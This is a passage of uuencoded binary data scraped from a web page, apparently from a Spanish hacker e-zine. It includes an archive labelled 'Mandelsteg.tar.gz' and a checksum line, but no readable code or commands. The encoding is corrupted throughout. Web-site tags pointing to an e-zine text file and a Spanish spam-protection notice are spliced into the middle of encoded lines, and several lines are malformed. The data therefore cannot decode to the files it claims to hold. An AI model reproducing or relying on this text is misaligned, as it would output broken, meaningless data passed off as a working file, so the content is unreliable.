%.`WCEYN1%4YH0:8R0-W,$(#U^9CQ>#;V>"&UUH"X9%K,[)J
M].V<%&T\+/C5G=P4H]?FZ*89=W%E%;6_!DN_2U4KA]_4=%PP]-5D*\]+CR^H
MVEPH5PRGA(G[G`OML-;V>5&VF,=P14T)A0*M>2MBF_{jumi [*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]}A=.M-,4JO8BAVW4;
M$&I)GM%])K"*\>U5&BA6&VTLRIK.TE?1V:W06;67[OE!;6DS[0WYVV^RN/QV
M_O*SI<4?^E+6#;BXBX?EO327R#57[F3G5BJZI/)G2]:)K_+T&R2?SB*ALBN^
M")YJED)C*>R;HD(63-7RB)\#RLUE!M=,--S,0QDG$-\,G?>/LJ`W",8Q:P&T
M^$@VW7OU=`Y6,@JQ<+-2$!RFK_]$]^.
M!L%0E/(P0)[:C<7[HE9"#C6LKHNX<4M*+$&?W6TEVMCFKCM7?&]'P#DK[KCJ
M29.>0'7CS4QJ@T7^.%%[&O5H;OH.
M-:38`SG%=87F#NSO;2G9UE)NRBW%ZSYYA%+C'J$GWAHB-^'G]`I"[ID]
M?5C2J7ON,&FG79Q&FE+#G%(N'$H00
M0<&0:GWC:K(RPAM_<;W!(H)C3X47+`8*TRM;#')0R'[W]P4YUW];=$N+2(,2
M1QB_K-[?W[$/V#-M.BNRSQ<0Z;DYOE]">>>+P.Q\'E*?F_/THM4A;L'&
MR:\KTDMJ`#?NE*LXJ6*@8Y+*2MN[Q?0PJY3?0_]#!"4P\>JPHN%1::S\W_0[
M[JKZJ4PDVY525(IZ_A-(TUDS?_1N7GI-=>:J1]=Q^R-=!>G*7;OXJK;"7)&Z
MHA^P:LX&5+$A"^YN=K:5K0#R.*J2Z_C?8_,$J
MGB[4S[D7FF>
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
[R=GAX][_'=#]$/*J4_VW\BM]O?NB.Z
M^SK\O@[_WZK#Y22`
MY#&7I>K#!;_N_73S>``3A#4I)?LG?+*9-^QRW'+*S1GH0UDVIP-/G?WNVPJA
MGMJ\EW)^.QW[_F-N6*PU&6@E[(9W=1+K(&ZSSU&6KY;`X0BZT;^#<6"N9NBA
MO:2A1Q&4\#TCC/30NIM!B]!'^]>@V\GO.`8>P..N&39+1+\Z;QCN8JGKILP/
M0G=F3Q:3J1(JYP$A,3A^;D0K1-YZ`3UJO_?@]>]{jumi [*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]}QL['3:,T<.$_@G]U3T7
M!6%KPT=;F[UY]ZR"ZT)#6Z);^EMB3I$=G4&GCZ]Q;=1BVEY)YY!N-R6_"CZ^
M_H_OOB,6BXRE!LYQMW(BRS<<%,GR"\RVI_*3;PB#(_D7J]Z"FQC&HO,O8DCA
M1V:[I4L&M&8(`:_6P^AL:/=,=I5]YFM^YX`AO99F'U*)]C;3((++B9U3K6{jumi [*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]}
M'3^W8FU;DT="`3/U+%WM.YZ*XBWEW6#JT%08AO]\
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
*'
M_K0C[LLCUX?A164XY=G#>6X\Z*+$;?D22P4_IH8P5SY]&(
M"4%3JI%V@HR@,G[/6.,_=;=:V]^PB%G8O2F<2_/K5WR473MT1@<<-3D,4*
M/:3[^8-YUK[35]<#0Q5;S`*0APK:SO=^CP9_-X`ZUF4[9E]%[(I[%)5ZHM-W
M9$^QJ4%&!^G`6I1,;RBOR+4$,>"`*%,%!$!-QP]1(C&(!:H_G6I)S4C;Z-<0E.PX[,-
M+E`5+KCN6$?_=G'\A].'$:+S>D$A.,1@L:S31;,X,50T@%YQ[!^$LZ4R"`.Q
M0'S2I43W&9URC)&<([T\X;:N38R"M,*7IM`7&PW&*AL;''46HS#B>!,%O@
MJI-HYR-7P)@:Q\_YAV4GF'-\N,(O'D4GP]$A?AT\'IT.#D>G].K)4Z\RD>LR
MI:5P)95/_6_4RTO]UO*H946_!'.?XV+'C'X1F6M$=RD23#V_7'4I<2\O[3(@
M"CX"3VP%51TLFVT5FRT5296W<_"9/V%Y64,#]1,"KDGA`TL;6*8W:]JO;POC7A1Y#SNX_#>$L':!@@%
MV^=U6AJ$MO(->QK;334GOMJC`.FM#1/$?-OR%<)'Y,S"TLLC#@H55XCC(W%J
M]"UO4D".T!7Y=!'T>\I6L-US,8KI"<9+0^&]E#"1:?G:H//7\"G-[!]U]Z
M8;83.C7(\#$;R*U;N/59<*X(SPE7PN!X-'#-.]GN;[AZ?`,.KUJFY]OV)-,X
M!)TOU##KCKH=84]NGPW]86KM4@QG*0'22W32$@%8'/B%$X/NO]?JK$$=O,138[H?^[IQ9/$O7CS9@;NCH
M'=Z;OS"9+F4BFS$$R<7C@JG?Y6ZJY\?2JC794X]`?1MZ%:'_=,XL<
M/N^GE>W
MZWFUJ^==7NW!,-I(C!!QB47(AL!*4_=9B*0DSS@/2R;7]2K]MN$PF7[O/"
M_/*HG;X#TN+K<\_#)NA_T/O@%J"%FGTQM!(SC1"%<$T&UYT5F[3,3_^?&
M;-;/8)[FZN4MT>>$U4O+Z+7E=/5>OI@8@ZUD%H]KJY]MK(H;Z;R[*3SA#)QX
M72[K78RD9`L6>=Z]Q\%TR39IE)5,<=I.WB^O_&?%!.8L=Z"N!#;(M`1'.$#^
M6-#TJK!/1L;4K%E9;69P-9+<.F#X>VH=;1\,-$?P1BRA)2>Q&%,S^D/'V&
M82&4#@^ZMM*6,;_A2,)C5{jumi [*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]}-(UW^TS"F;R-84CLY[O,H+[A-@3ORJ$>E3VO&
M13L,.0XHW37FO+-Q/R87AR%&A%H1N9QHAZNE8I)!BYJP79;`OB.`31,5VZ1-
MUJ4NVJ"]V+);,^UDB,2T:S7<8=O=S:(3[/_A]C?6
MT"KYS_WVQDWL$S[<_0C+W/Y5+J_X5P@)LK[B[2JLW7+7DQRWDM>#R#]/VZ+B
MCX][EM$.U8^[/^*6AR9I@!-K'00VK#)OM&KGB1!SW/=/OB1W,^?>+LR#[6B9
M%#9,L#T>)GK![07>(8>DZ+UDDNPWA[R=[J!,$JP5+/!G*2D.Z=\).X=XA$RI
M;]8(6L=@U(.!C\`T_;2C]J7;SC%">GK0_21N8&XR.3]#DU?/1TT.
MWUKD.MCT(_1X$SYV+H7$:/(/)D?31XYF,SF:&Y,C1.X6!&EZ"-+!R!)D?-/8SR>O02@D,3"4VJ`FXJH?%IVTU)QR0KDH+L=I34536(3(
M!VW!M`FHS4^$Q8AYWVH\V^8U>Q1S8%G(43[H1RDF?;YJK]:#W&V#%6\O,A
MV3*GP[&0Q(FF=1TZX0_VZ\LV]:]DKC)_Zjumi+('PD6Q*<")#3425ZDG$^+]>*
M,;PD2>[]5B'>-VEB>=L77]/:2YPEF9GA8H+4PP94ZQ-X8H:G^Z5-TLP!#HHL
M*ZZ)C%\Y?.@9#B1E%!O0.6]#NY&PWBPF6:WQQ4,FJ1,?Q&@0?1O-BB*)=%6G
M2'G/:6J)H)SHV8-B5U(65%47)>>4]J"=`5I`J-8/BX<1:14KSEDEZPD'GS.3
MM8`@5+$<2>O5D3';L1-RBHT07AS@#9AWACC*0`E?,!AG0+*KCOT8!@G-2H
MUO!R%($]CI%O*&Y#)#7K8FR'/E\K#9#1&;##T`&0(S:RZ:?Y)9D).M<;K0
MWW19`-N+X]&I)*;N]XD[{jumi [*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]}!>T#)P69M\S$<[>LVJR?0Y24D$$)'7Z&[Z$?#E
MMU,&B(XQ+W/^R83&H#WZ.O(VYV1LVATD"`,+:MQF^R,62Y=-9E))279Y?]7>
M@HBM"NSL:PT(R4,5E)"68QKI'XGM1(W53!0''&QAX2_L29QQU_\TXF9W2C
M'D/6($BMY][5;1+[P188YT6C/I,,,XO4&+GXL@*G=IRPS)O\J/0844",T_?7
M9%BEQN"BPRY9
M^$A'R.?%CFQZ'4R.F3#L1?4!C#2,ZK5:`MJFA6D#B)_P?QT'91<9S&[G-#-
MX0*Y`\HM*Y]VL)+Y(S:%7>+[R]@05',;K#H+]VH=V(?C)82/[`%7+^'M]'!C
M]J^&X:>2L7)A8+V/X.TL09XC{jumi [*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]}`5RS=1;]6ZX,ZU{jumi [*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]}QNC:'CVE^)JZXV0
M+JZOUW'UO.?];$YNC?\_1W%7/?ZRSZV(+[N%UU_+AN
M%]T)VM3DIP[LO;:K?NG@CTV2.#*RF$!;JZ=7(M\!U=!"0@[)6:9]B6YGK[$$
M*C,_.04JV0"5T?P_B%.Z"OD?&72J_4ZY02>
M4EY6?V@K\:SIQWJFUJZ_9M![#DJ9_W
M0ME\%L)@`.6%?^NF"L9JTT'4TYT'1="8_U3C;P(8?=(])NS_?;DM_^O%^O[?
M\/Q\G__KLSS8SKGD\"'1I40#B2[Q?V7E^Z6+&Q)=
MK0OA-0D/WFPXUDTLSFIL0[R)^HG'=*`UC7L_;"M+R1X?N*67#]\")*=WGXJIB1(
M#6BSO=,EX8GZ@7-Q;VC4@.(]L;4.0Z@X(-Z.Y89V3CQ@97*1+;X=1AXI
M7jumi\`-Y#G3=]ZEK:>SE>*J2Q[]A;DJ^+!-3A'.HSLC2JVF%UHOX*X^W6
MO4=MOW-WQ]TZM7!.3DVI,86[,]L`$($&E<48X8R+2TA:NEZC?J+YK[R,5[
M9X+E923I3O@:1C]LUY-=;:XS;+4!E.L3WV!(*X\O[;*Q6^L;]7INME_#9J[M
M!E9/0]CDV"PZOB\LIJ;"ORAVG^%#`:]3QZBAZ^<7Z0.^FB95??)+>BR3)
MGSGV%*^UDSI3Q(O=1KIOU,LOR`J.96Z&K(>;ZI?M'.R=/2^GF\#SIO]8;AT'
M@(\VU5C$*SN>K?AN1:EL8@;@900MG#B0:33C5CU4O/;8TXC>E[;5%[IO"J93
MGZO2BNM[S>S'_Q]P_$W6ST]J8^RP_^C=N8O_@@]D_YT-AWO[[W,\#])ICHC@
MEY=O_O1?;WZX?'%YZ;;R_7?;SPSH59:.-YPC^,7X`,]_Y\+.V-M*MH>.%>
MV6!3T9<72B*=
M,^^=G4#G*@R+^G=UKR\`*X>/L6[:_,>RJ,QOQA/\WGM"6'+FFD"H-H6N69B9
MA+D<"/!I&)Q'HM9QJLQ:E[FL[<+DI/Z7,+FH_R7(>.A_"),7^E^"#*8]'TSZ
M4_,E70^F%WYRT=(Z[;=!OSC5JHD:OQ__CS?^7/03RY@=\O]\=/ID??U_^F2_
M_O\LSP,X#^2S2DW+8J:6.E=Z-E/CHKA2D[A4";V<9D51JDE6-(FJ**R+*[I95PKG,-?Q_5DKJIYH0$SH4JE
M6J:YHE507>1J%B^TQ)/6U$Q<40/EBGZMXF:B59UR"],T6P!80HU6_*XDE%$S
MT83-DIHME<[?T8)WB6:6:DZM5_.T).P8L>N4^E<4F5HV":"4M/!,RF*IJ@5U
M<@)<:;4/'%;%+%77A-`5%:OCF8HGBU3(>ZTXS;/BXTL:)")2(F<'U#9ALXAQ
M'`'"$?`)G_FIMPV\=FC0$"8+%%3R?T:KW5Q55RE^HZ\%U2\:JHHQ*(I:76F]
M5!GZ,6^8I:YIE'5,8YJEBS&06JF,&M(`C3\J[.FHBLK5J/^.1#^]([#C9D5#
M2,@N&_P%N$E<7H%S\UF334E>3O6LS!@SI+"9":E7&U)%+D.3X]B'[D#5DU
M1S_+HE@H+`BNJ=DQ7&N`%(U`=;7"QRDQG\X2E<6Y5M;3C9@A)3(F-#50;0$B
M@Q`59DA-9:_`,65.?1CKA)L@09.D#7[28H.Q+/."AK6D!L+UBN4]5B.+S@N02WO"@+$`'S+DIO4MG.?_A>
M@L0Y?5P45+"BL&.:-,,412K"R(M?*8YI]**VHI(2&@\QA3=D4-3JBY&+,;#(!IDA0EYO,"
M@T(`9L21&"OJWJ+(&^Q.XY>"<)RK8@*>(OR)O@^B;Y-WF#L*.7"R%7$DS1/Z
MF<6_I?2CBI,,]-)+^C&/ETN\U'&52E%=HRA),OI![`UG0X63--2LV2T*O^4Z
MOL(7<#Z.C%8*NSDHFI8+O*?O4J,@0M`O1/B:7S3+%*"K9LQ_-R25QO0+G^
M'Z?4I7H._!BHUM)^3),\%?C\?J'+28H5-T"DBR6WJ-%BJ8G#N635E"0R^<00
M/*3\&Q%Y.B>D:YTPWNRKI=I[*S27]$)J4]]J*4,,`329A!G).6!7
MIC/N4DVREGXT58P.34HRWN6GM@US#PVB8YI?^!DGB[0T2(ZK(FNXA7ABD(@7
M-&K\E=8#I4Y2P&YRF;7<4*D%VZ;DUFER$&GYBU>(Q`9-+?IE1FC-!.!UG//_
M]$VH"L[YA68_,6U%^#6DIJ"(D44AMY3+Z
M-/&QAP[EFF-(P!E$KF8,UL3?18.+OC3@*UQS)]ZHYQJHDPZOY\"U6O#?P+D8
MUY!@^_'_G<;_][8_]\_^V3_[9__LG_VS?_;/_MD_^V?_[)_]LW_VSZ=]_A<5
'``U5`,@`````
`
end
sum -r/size 12165/11797
>>>> MANDELSTEG <<<<
begin 644 Mandelsteg.tar.gz
M'XL("&HKQZ@_V&:(M<[+4)>]D[,WO;_\H7]:Z\-.1_-?K1^M_*OW'NWM=;4^.-CO
M[!\>/GJTAV?[C[M[?]%_+%=?__BGU,;&FR`9F;A?FK'^L=ON:'S5+\]?]&[+
M/!B6\@RS=G__3ZFKB2F,+N>ISO)TG`?30@=QG,[U(IWI,M63:&3T,$U"_)N4
M41#K45`&.DITR+WP'1OK:!J,3=%2X^@F2L;@!Q.&N0D*,]*QN3&Q3D-=F.$L
MC\H%R$VS(,<0Z!F#T-!U%863WA]2C
MV=#H%/OD7J9BNZ6+,LW)&/20B\P*,I.9(C-#NWP`VI"+#^V>671KXJ*E@Q#\
MZODD&DZ:YS*@9&S:B5P4+6Y:"51=`L>3%N7CD)2A+?S>(@,4M;M)5JJ"`J
M=$*!H1X$WER@T601S@M,37(1Q$WG!HH9%20VJR`8,II.TH3O67:X[8^Z9^>
MG^\&^1028P%.1,LY;.MCGC=61PX/,TASKG!A^@5P5SH5*#06S\@>HT,PET
M71VHMN<)!4>Q*436`+JQ2I]'Y01R:!6:("=_D"&/BH":G*1SXZP@QQXYM0%A
MH<#L']F%:53*GR46KLLB"#
M&=R(IFN6%8)&/M-60LP)K'DG"SE&5>\A
M7E63MR8^F%DVDDV:!T46$G(L>"AQ^D-!=L\E"S`I[&MH!
M##H.%K"2CV!-/`22#7`V"Z@>!R.F)6S'1:H38XUF;$IH&H<*!9#_;(%/2KP8
MA@R3C*"XW[G=/^H(
M$#NL&)DPF,4E(5<ELK]2+-'7S,35'644Q.M=6D#BG=Z:PII:*H7-`0
M_)-X89D-='?O:'>8QH29(#8E9++!;63=0CR7I&01N$D_%TI(4RDYS#H?`5O%
M&([*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]@GX6-0$;PF#-G(B4H.6,2PR/,L#*.A#T?%++^AXP,19GF10D/F-IC2
MH<7,"5TB,Q:F@YN([L`C2!9I8A1`MJC%#_)2&%L&KET.(Q,H(YI7[F(7'4?D
MFF593(UY=83N(*QMR&&"E@LAU#VM2KVPC?CME
M`.==T!(U3Z+L]"](8M14$S*'%XVY]XNI1@IJW*]=W"X8JCS"CO"
M3+33UA?6(F*ZE=6E4R*FB,./4L:\ZFE26)7[F"5)68"]@Q&S-D1H:!3J6!(&
MIW=NJ5MJDP#F:A+F?:#,-(@V4V5P2PIKU@&_:SYVIZ.UW9'QY:6^;;D/VX$/E]AL>,'`QPZ:8>5O$-6Q-J@X4X-Z!:+FP.0MF_;-(Z=J
M5W?XF"4@PMD%\#5IZ^?^HV9U8:SU#HC$B+@X7JAG:"P:<=7/B,O>;SE?ID_3
M!G"W-7(C"5V2`]5B!3P#RR-U[R)$,QXYNBPAHH+PQO`"X`R]&NKTK@XX8B^#
MS`75=8NI=U1V2\A/\EK"\KFU000F'Y0;X4FB3^)#6AV%4&18EW7L%*XT(-
MQ89#536#")AD3%:207R>#:,%,52O!>K7ND,F&F=8J92-/(V@]J.6>Z@(;U
M\_Z91A)]ZY*U)JPVBP8;-NL""-O!:X>21ZA\EB#K^&QLJNKR'E'W+5:7^;V%-/20866QN,*XZF"/DMYMU.,\O)9$%V59AX[8C01`<=1
M2..#*[G$*4BT!=[5*;!/(CFK)_`!.@(/#L_^]@!DJFFMFC,Y!UK_C[W+CSC]=,XDPQ4E(
M<+RJ1PK$T/^=1%G74R,29OFO?#\)]!OI8-&RA/<>"4)[*,]R^,0M%92-,\A*S1=,
M#LN"(NI?/.?X]"45LCDH_]O#?VJ#_T=L[D@6RUR-<0E;([HLZ1-),0/L;TEK
M^QR^/'>9ULIAZDX$C2
MA983#Y"R``G6+(N2YI8G8^>#CC/HQI:JE^>0#!!1LQAC[2+;7)?AQ]-H32
MI04.N&WZ#=R)7#J.G$K.6^I[PE.NJFJN?96!@8=K3@\C8UWXK:INW;1W6B
M):L!KBJ+,@GR#@]\*C7TY"&6#0.IC1"C7F0A@H[EB-VVIXJF`&F79V-BV
MW7K"Q_C?=UE50UE*?3`QRMH0!_69&614;MH>F/`M>1BVDYS.M@@J:]1_%9/\
M:R/9\-V?9GNDV3QB;I@',3N,"T;M;Y[U=`/R1%U+`@*"Q:T!TN4A%!%1SHC
M2UW(>31DUKK7J$])9AD^?-,(S-)4_C[#(P;AS3H#V/2M/=&9+2?)35UJ^A3*
M"+5O]7D)"UK8+E@1W9;T*5.#=6
M+,0V4^E*N!S2N18F8JTM<1P*6K%(:K-O0]=F\_K%[B8YE#U;[#NHNIQ<*DCD
M,AXQ!\AA6\E?B`U,H=E89%.;EN%;2#12#V&/P/LB`V1+M1NL.SK(%U%A&UBV
M/7]PH.]+TS)'[*Q@-(Y`^Z-R73F*US\QZ'EOWPON4K4,'XI+45NU.WW:T>JVLJN69
MLUOYLY_3:T=1,9[Q,@E:VQ<,KJZ8G.*WMG6(V.4+5;GI:L*/3V^"T4ALR>G-
M6COS,UBPJ]I$KRYP0>>9[39:OY1ZN[K8&(C(M;<(@(%=S97X>(!65!0>E8TJ`BLC$UQS;E.I,]=4A=6P^978UH;*_[KR[>OS[3)Z\_G'SL
MZQ_/>Q_TU:N>/G]S\K*GG_=>7%SV=+_W]NS\[4M]_E:?GO1[7'>I3E]=G)_V
M],4+_>[D\N1-[ZIWV=>O3OKZW>7%V?O3WIE^_[;WMW>]TRM\/+F\.G]Q[]E;+;?.O^=.]V6(4@'$(IICZ0H"*7>%789%?A:)?IF")`2$.4
M@8jumi"<82)&/C0B=*2QBE0\NJ=13Q05Y61JR5.#2M)3W^0(AD.YMQ?S\TTE
M>T59WS4A]B-0\E(E36S'Q<8Q)=V0U:;];[;\W>V`/UC?H-6JO@%7S5RZ<3$>
M,>C`MQ:V15$ELKXALMP>*M9O5.Q%>9C#K2KHDXP*ME0T\N;ZNNOJCLZCJN_@
M*06C[N/5NYJ!NU#BH+_^6FZHTGV1R=YQG=>JTUT?I>6T?)BV-V,4HKXT4'*1
M8,.^V\^C:C1.?#8>1GE1-AA9[6(JMX6DD,P:7.5$MS1WPJ^$,$ZM8IS%8N7/
M=;57LUXL^=.MWV38M](!5J3XDKK%E[4L=)&VUSD6RX']:NZSYD2E4$*M37WR
M6Y-/G)P\,\M(5WHF;C;#@Y-2)/;1>RGV`MQ8MJ4ND>$H(7O)-5;8#\A6UV]3
MZ\/>Q-;%O"VN7$E7(;QM359%B[':9@)R8UK*7JKDDJFAU$"PH!/M/0KQMZ[&
M3E7HP_0:/8VZC0!F.[=N^2]:;4C;H:E(::RL%,AJ]<3_F?)X8'P'RV6&81#%
MLUR>\!T)%K[*YFBN;67[IJ)O5K`CPWH%L%CXUS(:%/CB25U7*^D)@>^S\_[5
MY?GS]U?G%V_UVXNK7O^.JW^(9SFJ0FCU2I3S/!@$Q:I\A>[DWU`A^$Y1*BA)
M\<6T@;YRA4(3F:P0V_UO]_:OU/XV\/@O*/?,?PR^]_:KW7
M.?#O?QXX:_
M5/`SU@DP8'!4+GNJZ>G@[P\JZOAR_(WZ1GW-__]M^3].J3WY@VWL]_S_H/MH
MQ?_W'^_O?_7_/^-/?1>%O#C65Y?O>^H[=X7,+QO=ZNN+D]?]WD9'?4=?0NI9
M+C*#H8U94J!J@$L-)T&^P=K@N!J#J>;EQ@;2C>YA]53':3*6AX_VZH<5&;MF
MCC!VQZ`LC>T@N>8@;WP]D[YEM&&;'-7SP@T4VQORjumi\J01P97L2OTXGY:?_H
M"Z0PV"#V'^G_P.)_N_]WNX_7_+_;_>K_??9=OG;V&KKT].>]?/SZ\V>/M>
M#9U>O+ZX?'/RSHT<=50U].;D;]>G%V>]_L9^Y_M#I;[Z_W^>_[M,[X^SL2_[
M?[>[W]U;S?\?'W[]_=>?\J<>[BB]4R7\[(.TA_H'O76ZK4_3;)'+6Z?=[[_?
MUTMUNI9E2ST#5J;5BN9D66Y-EI>6=W<^2,[_DJK%WWNE.PTN"C*8,$\OPR&$Y;FMA>MTX%9B%?D)C8WO'!V?1/>
M[$C;A&2@"W`WM)V3JFTP,FW]-M7S((=#E0M*GN%)KRS+C)>\@VB."H7
M),6WI(//6
M1U2VW&]_Z/3VI@IUCE1.(#?+>"N+?>7.E61F276=->9/BN9RE;0K+8+CX+?_6K[KV]NOQXK!J!Z_Q*8M!U__R_
M>UI_7XT\/SF3`9]GR"ME=5A[<7[9OVI,P'`8AG74>]T[N6P,[QT<5F.]BQ=+
ME/<.'E=C0/M7CA4+=-A2P1#+:*@E4>9#^ALOJ7_ZI)_J>R_/7QP]#NX=5]-$
M1J>$:WG7\*PW5L9.K[PCN!Y$Y35L
MF*^#/]6=]4E1\GO#TFI:&O3G-@UNK\G>W:-<=XTIWH[JV/3X)B\E.E4/#O
M9\@O+.2G.M?V-G/Q&^;H28-=1;6WBXO;4B]\.C
M[98.MV4:?U01/>T=7BVC0D<7-7W_:?Z
MZ%C]NBR7E4C4MC5L43"OC^'Q73**F5G*"RI[*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt],-9_`%95U(;[AQ`Q'Y\N2I
M7M7$_:/MFL^:&I:M*Z,I[.J"!P\^_?)TB]O^N^Z8MBQ+Y7=6(K`D[AA]6EE3J1C/E$8&S?\WV_\H(OGJYY?JUJ,ECM=
MWP3Q5M8:-NP_.U95?+#FGQLD&`G<.GLPW-;W:_1=.CY>W%R3R-:\%68-@O.F
M0V66I'/MN=@5O#JC,7KTNR]VB7RS7LZUM1)V1JV=O+4S;NT,
MCI6/+3N>\`H(MNCXS9#1"*_#6I4&_><3Q5&H(?>QKRAJP::MV;
M#^Y16R8N3&,:#ME>E'M:W_H1ZR=AEH.O<`N33)ZW[IWRI=K2WK[)^OO%_R3W
M*H5Q!W?PS@^F9@I7WJ+5M'2G)7$E#>7[-F>[<8\HS3G^V?:="")12VT\W-$?
MY'>AFSA.V!,3PV0L-S)RY4L>F15MA/;GHUL^OK?T84MW6[J2=XF:>RG.KJQ,
M=(O_W[8FTURX-L7_!&MI#NUTBT7Z@\[MX\Z#H]WNG1-^_V$##"RN5;!F9^<2
M\YI4W,#XMP8&:P._JIKCO=/?DG:5V=\?^'^I\(LZ6@:XW3N.]I4]5.2"T?^U
M=ZU-;219]G/I5Q2TS52A$D;RBT"(&+>[/4M$C^UPV],;01,*(0DD6P]"@@:Q
M9G_[WF>^JDK(GNGV1EA\`*1\OV[>/'GRWCD>.FAT=?^($]G9=(.'@Y81W$%>
MLB9;[H:!"UAE+4N5;6Y"2FL[F+9P6,#QPA5GPPY48!%`!$KFWP0E:5A,ZH
MV^:WP38M3(!FY0=9W!JS=^R$GS05#HFX7&E$W'(WOI1N?DV0"J.(Y`95.6+)
M-.E?-^TGVA0F4^<;O!9J\CVR!$)N9N^0`C+,/N54D*'$.)8$)QR`.07[&A8R
M@,%(,-&!T613J2`WS^ZK$(NWU%9+"M[:DAON,!9^AEB4F40YG?4[G[@J5)>6
M:3K6N17F(,L)E)B%LUC"'5
MTM`HEWG%^[I:;=IZZY>'JNS8&NLWVZU&TYTD^+W)XRZ?57R(ZQXE5V(.A'!L
M;Z0V:W.;2T%X"]L]5W,B\,L_@,5*W(N6#:EO'#5
M"_TY5Z#+TXG#._1Y*8J$MNPMCW\,9'EW-)WWW>1WE>^3_V\NZO]$C'$Y_MMH
M/'W^S,%_'R/^^^S9TS7^^U?\,/S[#_L8M6I8\??,W:,.AR"!,P9/L08WD)'
M44.)%=R%"<&&GN8T5-CX:G_W9CHJP*LV]M.$W[6G5R._"22K;G.?[1-S'6V(8&U
M9@Q[[ADMP=,QSB,:B9WXU_ZEO.O#R80MIE<]?32=Q81)IG^JJ12U)E"3)Z+R
M>`BM;N!KT1WN'0/FN]!Y'.^Y@/V;#^^]T/INXTG%!K7!:F
MQ:)F!"K@1_P/4LP_%<2^,JI&9L4ZM',MH^+N$'(R,AJ>.*%X'AU)1@49JPF+B-B:'$
M+-8K9]P`R<80(_,7TWG8'(-XVB3-"NW=-`QNTASLR=UKON%9`;+U4WO4GYPC
MGAII3A^Q$SX27NEGJ5A*+K'?H0Z`WHTW"/..M[;B87Q04*R]*(BZ038,+D@.
M`I>8AA]_K%9/Y"+'.XOE*W<8[V+Y;EV2CU"91`5M#>\U4P?\E-G?^?1
M[VR("[TF>=-YU$P!6SV>&\[H(WA-@]_A`Q^,O(V]TD#C@+JW68TGSI@5W'PY
M$S^&F1_Q/C=GBK\^>/K4[U^0NC"`37XA.-V*]UXE-TF)Z<+:GAS)O:LB[W[%
M1H91"#-+O=EAAYYN7YS/N;NQX8G.BLA?<'%NQ278@^F0(9XPHQ;*LR@\AC]L
M4?,9Q#?UIPDJHD,$*=4`NIVL):$RA@]GU:@0G8C[J#:C'H56(,B4'.A3=;8@
MT,@J{jumi [*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]}K?*];G2'4#;8&>NZ`6R#JGFAN$W,46U1%KL928-%RT$C0@XM,0C\TT
MQB0$EW3A";2FBM!>:0P0BO43EH\Z&3Q=`%&:/;D"1`E[3UZ-DU0O_!I/,#I-
M]13J6<4;)_G42+'$^C/&S?6*I2"1WLG!UX>'^1O>^"%5._)4"JXDI=G2K#PE
MHPR3\=KM[""\(;,(><-7JAVQ-4EV&G&?0.W9-](%VRE9B0@EB%ZKZ=6X`--_
M=@/E1BP">6%#GE`Z9,FP0ZI)/-P-F*->-N>5";7U[YX89BD<_5*UF,NQD=
MPU!<()VY$!.U)S6`O:@^M+2D!*\=.&/"AD$/X/#]KXZ37K&4A<92NE&D/G^.
M$XP,NP65B=N%*F00IG5*;36=%C*67=QD!WZEGD;J0=UL=%PS4Z]*I-$^4RR-
MIMH:U&I#]3+%/^*V6[4P"6=NFV%Q=^%NI
MK0++B{jumi [*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]}..C/,J)N&2#S'T7QJ-4&_PYFGW:*?&(MUI('?^;P&*SI]9+K)>%*3
ML:(ZOB`J]-3##9&`%I6U<%+=R;I^B[>VL*ROYF0;@I_5T++5]_S\Q+T5IX>@%>@J
MT,^O/_SR2]/FMDUWCF1KV(1YQSJ&QPU+BH]KTU$O^&8X<8A45JW(1-WN]U@J
MRF'"U&W0F;?)-MBXWB2;<(H;^JMA7.0,P+C3H5&<>J.
M26S/<#S?[TUZ:I+2Q2@N:)HIL#'5S3V*SER1&3>@/B3UU*RZR#E:)DD==^;.
MY73(I51!"8.,MN#0^>J55>"D"HJA@RL&7`L:I^->8F\:?]X]/H%(A81*"KT98(5
MF4P3RB?-3!2CPAF)37U0D`P*]M-!]15LBSPHH%F1-F&^CO;72FA9;J<,[NDI
M+$U;+90,Q6R8U]-+!2CE[;J9!<[`W&DK3'^G=/I0<<4[(4RE<>D
MSC9GS.7A7&U4F2(%G)V_"66'V3JV'GRU[\RA.V%^D.:9>.(V>Y;5,ZBCD[OWO0Q_('QA
MM6UYKVDP\YQ$I5C/DAD>I)8!8U?A*ZYPQEN).JQOG81G1+F]?-M8ZOWTTC
M_#/M1.5_-/&+W(X?6S"$(A$$,C%,PB6UN5NQKE\P2I$J-CQ61<%B7KLPO.)J
MGUA[F6B;1VH"_6$OOL%?O`/C["]"D$U6V*[8+0,&W'M_E>:G<[Q)#BO$#C-;
M*L.9C7;MIS.\C*G%O:M3,J(C'%:9Z4;EXX&@B>D!JT6LMQ%$K#B'1)%L!2/B
MP]IFCGHI-9["W7$K0,-YLD<>4"V1+)"=2U4E4-,KB785#XF/\]&HU?<7CD81X`KAF)FC
M4SBU@NL3C>*-T\%!;I0D6OFLL7&\P2P:=#.HT9<.14''Z?FN0,?WNJAI%"")
M[*C^?D2.X6KO?E]O!:I\LV#036I'F1-]8%EM[>$CJ)+I*[\JARW_TLET4TG^
MVN:FC67G9C"[D?YOV]&T1^YP%1R:&T/+C@J5A#?3BWF$>=2.(IVX=C*X-X%
M'>"V[#`8#E,)6>RK-#0VS#/GHBTLB?EU32?+H(=7RD-N_KZH-PM[1@EDW2?CQ1[$PFC"<[PV:JV(Q+Y&9<)#CI2.1GU&+%*.QS
MLR+,8X]@*I?'E^<:N>52(#-DN5KXJEKUA:2L3XJ'S3#08F8N>56WQ?HENXQ???OSO_I+
M^#,Y9O%R^P_UQXW'(?_O:7UM_^4O^?FA\@/?T1G'&2@9_^G[JK#T0"8'GBX\
MCMY.!7-!QV;L)B-3GR"Q6A=3UR:^0X^_C5UW'I!%@4,/4R\LI/(&<5ATH&)-
M2#FFI>#`\LM/Y&(%MKR7;]_ROQ6JW0VUIU=Z4
MY80]AJ9*QV@WCM,C.2\AH@0([2NQ8$Q.C_#&&UIB,HUK:C3+9N_XC/%+^?5?
